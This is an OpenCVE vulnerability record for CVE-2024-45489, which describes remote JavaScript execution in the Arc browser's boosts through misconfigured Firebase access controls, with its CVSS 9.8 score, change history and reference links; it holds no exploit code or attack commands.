CVE-2024-45489

  1. OpenCVE
  2. Vulnerabilities (CVE)
  3. CVE-2024-45489
Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however (because of misconfigured Firebase ACLs), it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary Javascript on that browser in a privileged context. NOTE: this is a no-action cloud vulnerability with zero affected users.

9.8 /10

CVSS v3 : CRITICAL

V3 Legend

Vector :

Exploitability : 3.9 / Impact : 5.9

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction NONE

Confidentiality Impact HIGH

Integrity Impact HIGH

Availability Impact HIGH

Scope UNCHANGED

References
Link Resource
https://arc.net/blog/CVE-2024-45489-incident-response
https://kibty.town/blog/arc/
https://news.ycombinator.com/item?id=41597250
Configurations

No configuration.

History

26 Sep 2024, 13:32

Type Values Removed Values Added
Summary
  • (es) Arc anterior al 26/08/2024 permite la ejecución remota de código en boosts de JavaScript. Los boosts que ejecutan JavaScript no se pueden compartir de forma predeterminada; sin embargo (debido a listas de control de acceso de Firebase mal configuradas), es posible crear o actualizar un boost usando el ID de otro usuario. Esto instala el boost en el navegador de la víctima y ejecuta Javascript arbitrario en ese navegador en un contexto privilegiado. NOTA: esta es una vulnerabilidad en la nube que no requiere acción y no afecta a ningún usuario.

20 Sep 2024, 19:15

Type Values Removed Values Added
References
  • () https://arc.net/blog/CVE-2024-45489-incident-response -
Summary (en) Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however, it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary Javascript on that browser in a privileged context. (en) Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however (because of misconfigured Firebase ACLs), it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary Javascript on that browser in a privileged context. NOTE: this is a no-action cloud vulnerability with zero affected users.

20 Sep 2024, 18:35

Type Values Removed Values Added
CWE CWE-284
CVSS v2 : unknown
v3 : unknown 		v2 : unknown
v3 : 9.8

20 Sep 2024, 17:15

Type Values Removed Values Added
New CVE
Information

Published : 2024-09-20 17:15

Updated : 2024-09-26 13:32

NVD link : CVE-2024-45489

Mitre link : CVE-2024-45489

CVE.ORG link : CVE-2024-45489

JSON object : View

Products Affected

No product.

CWE
CWE-284

Improper Access Control


NetmanageIT Website NetmanageIT OSINT Web NetmanageIT OpenCTI NetmanageIT PDF Tools NetmanageIT CTO Corner Blog NetmanageIT Email Header Analyzer NetmanageIT Password Pusher NetmanageIT Internet Health and Latency Dashboard NetmanageIT Dedicated Speed Test Site NetmanageIT Ubuntu Mirror 10Gbps Copyright OpenCVE 2024